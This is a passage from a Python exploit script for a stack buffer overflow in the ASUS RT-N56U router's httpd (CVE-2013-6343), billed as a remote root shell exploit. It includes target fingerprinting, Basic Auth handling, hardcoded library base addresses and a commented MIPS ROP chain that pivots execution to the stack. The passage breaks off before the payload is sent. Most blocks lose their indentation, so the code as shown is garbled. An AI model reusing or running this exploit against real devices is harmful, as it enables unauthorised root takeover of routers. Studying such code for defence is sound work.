if auth.lower() == "yes":
print "\n\n[!!!] You chose to use HTTP Basic Authentication [!!!]\n"
sleep(1)
User, Pass = creds()
return base64.encodestring("%s:%s" % (User, Pass)).replace("\n", "")
elif auth.lower() == "no":
print "\n\n[!!!] You chose not to use HTTP Basic Authentication. [!!!]\n"
sleep(1)
return 0
else:
print "\n\n[!!!] Error: You entered %s. Please enter \"yes\" or \"no\"! [!!!]\n" % auth
sleep(1)
def sigHandle(signum, frm):
    """Signal handler: announce cleanup, pause briefly, then exit with status 0.

    Registered for SIGINT (Ctrl+C) in main(), so an interrupted run ends
    with a visible message instead of a raw KeyboardInterrupt traceback.

    Args:
        signum: signal number delivered by the runtime (unused).
        frm: interrupted stack frame (unused).

    Raises:
        SystemExit: always, with exit status 0.
    """
    cleanup_banner = "\n\n[!!!] Cleaning up the exploit... [!!!]\n"
    print(cleanup_banner)
    sleep(1)  # brief pause, presumably so the banner is readable before exit
    exit(0)
def main():
print """\n[*] Title: ASUS RT-N56U Remote Root Shell Exploit - apps_name
[*] Discovered and Reported: October 2013
[*] Discovered/Exploited By: Jacob Holcomb/Gimppy - Security Analyst @ ISE
[*] Contact: Twitter - @rootHak42
[*] Software Vendor:
[*] Exploit/Advisory: ,
[*] Software: httpd (Listens on TCP/80 and TCP/443)
[*] Tested Firmware Versions: 3.0.0.4.374_979 (Other versions may be vulnerable)
[*] CVE: ASUS RT-N56U Buffer Overflow: CVE-2013-6343\n"""
signal.signal(signal.SIGINT, sigHandle) #Setting signal handler for ctrl + c
target = targURL()
try:
print "\n [*] Creating network socket"
netSock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
if target[0:5] == "https":
host = target[8:]
port = 443
print " [*] Preparing SSL/TLS support."
https_netSock = ssl.wrap_socket(netSock)
finger = fingerPrint(host, port, https_netSock)
else:
host = target[7:]
port = 80
finger = fingerPrint(host, port, netSock)
except Exception as error:
print "\n [!!!] ERROR! %s %s [!!!]\n\n" % (type(error), error)
exit(0)
auth = basicAuth()
junk = "\x42" * 109
link_nop = "2Aa3"
#Base address of ld_uClibc and libc in httpd address space
ld_uClibcBase = 0x2aaa8000
libcBaseAddr = 0x2ab5f000
#Rop Chain
#<chown+68>: move v0,s0 -> sched_yield()
#<chown+72>: lw ra,28(sp) -> Rop2
#<chown+76>: lw s0,24(sp)
#<chown+80>: jr ra
#<chown+84>: addiu sp,sp,32
saved_ra1 = struct.pack("<L", libcBaseAddr + 0x73f4)
#<_dl_runtime_pltresolve+68>: lw ra,36(sp) -> Rop 3
#<_dl_runtime_pltresolve+72>: lw a0,16(sp)
#<_dl_runtime_pltresolve+76>: lw a1,20(sp)
#<_dl_runtime_pltresolve+80>: lw a2,24(sp)
#<_dl_runtime_pltresolve+84>: lw a3,28(sp)
#<_dl_runtime_pltresolve+88>: addiu sp,sp,40
#<_dl_runtime_pltresolve+92>: move t9,v0
#<_dl_runtime_pltresolve+96>: jr t9 -> jump sched_yield()
#<_dl_runtime_pltresolve+100>: nop
saved_ra2 = struct.pack("<L", ld_uClibcBase + 0x4e94)
#<setrlimit64+144>: addiu a1,sp,24 -> ptr to stack
#<setrlimit64+148>: lw gp,16(sp)
#<setrlimit64+152>: lw ra,32(sp) -> Rop 4
#<setrlimit64+156>: jr ra -> jump Rop 4
#<setrlimit64+160>: addiu sp,sp,40
saved_ra3 = struct.pack("<L", libcBaseAddr + 0x9ce0)
#move t9,a1 -> ptr to jalr sp on stack
#addiu a0,a0,56
#jr t9 -> jump to stack
#move a1,a2
saved_ra4 = struct.pack("<L", libcBaseAddr + 0x308fc)